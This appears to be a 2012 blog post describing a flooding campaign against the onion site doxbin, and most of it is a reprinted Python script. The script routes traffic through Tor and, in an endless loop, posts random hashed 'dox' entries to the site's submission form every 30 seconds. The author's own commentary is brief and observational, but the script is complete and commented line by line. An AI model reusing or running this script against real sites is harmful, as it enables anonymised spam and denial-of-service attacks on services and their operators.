Looks like #prosec is nerdraging on @doxbin. The effects can be seen
here. The attack I noticed first was a semi-lame HTTP POST attack that
floods doxbin with garbage “dox”. Code here:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
| #!/usr/bin/python
import socks
#google it, it's a common python extension
import socket
#127.0.0.1:9050 is the default TOR socks4 proxy
#this connects to TOR
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, "127.0.0.1", 9050)
socket.socket = socks.socksocket
from httplib import *
from urllib import *
import random
import time
import hashlib
times = 1
while 1:
############DOX############
doxrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
dox = hashlib.sha224(doxrand).hexdigest()
print dox
#doxrand = picking a random character
#dox = SHA hashing of the random character defined in doxrand
##############NAEM###########
naemrand = random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890')
naem = hashlib.sha224(naemrand).hexdigest()
print naem
#same as above
##############
connection = HTTPConnection("doxbinumfxfyytnh.onion")
#establishing HTTP conenction to website
head = {"Content-Type" : "application/x-www-form-urlencoded", "Accept" : "text/plain"}
#constructing the header, so the webserver will respond properly
parameters = urlencode({"naem" : naem, "dox" : dox})
#defining the data to be used during POST, note naem and dox refer to the random strings from ealier
#they must correspond to the ID fields from the web form, otherwise..it won't work
connection.request("POST", "/post.php", parameters, head)
#pushing the data to the post function of the php file
print 'Connection OK...Continuing..'
print 'Spammed',
print times,
print 'times!'
times = times + 1
time.sleep(30) #in seconds
#self explanitory
|
Now, however, it looks like there are 403 Forbidden errors. I’m thinking Nachash
will get things running again soon.
Author
redlegion
LastMod
2012-04-11 06:42 PM
License
CC BY-NC-ND 4.0